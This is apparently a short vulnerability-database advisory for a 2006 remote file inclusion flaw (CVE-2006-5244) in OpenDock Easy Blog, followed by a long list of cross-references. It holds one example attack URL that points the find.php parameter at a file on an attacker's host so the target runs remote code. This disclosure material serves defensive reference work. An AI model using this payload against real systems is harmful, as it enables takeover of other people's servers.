This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).
http://[target]/[OpenDockEasyBlog_Path]/sw/lib_find/find.php?doc_directory=http://[attacker]/inject.txt?
Vendor URL: http://web.opendock.net/ Security Tracker: 1017027 Secunia Advisory ID:22335 Related OSVDB ID: 29634 Related OSVDB ID: 29640 Related OSVDB ID: 29636 Related OSVDB ID: 29637 Related OSVDB ID: 29638 Related OSVDB ID: 29635 Related OSVDB ID: 29639 Related OSVDB ID: 29641 Other Advisory URL: http://advisories.echo.or.id/adv/adv50-theday-2006.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0108.html Keyword: ECHO_ADV_50$2006 ISS X-Force ID: 29399 Generic Exploit URL: http://milw0rm.com/exploits/2495 FrSIRT Advisory: ADV-2006-3970 CVE-2006-5244 Bugtraq ID: 20408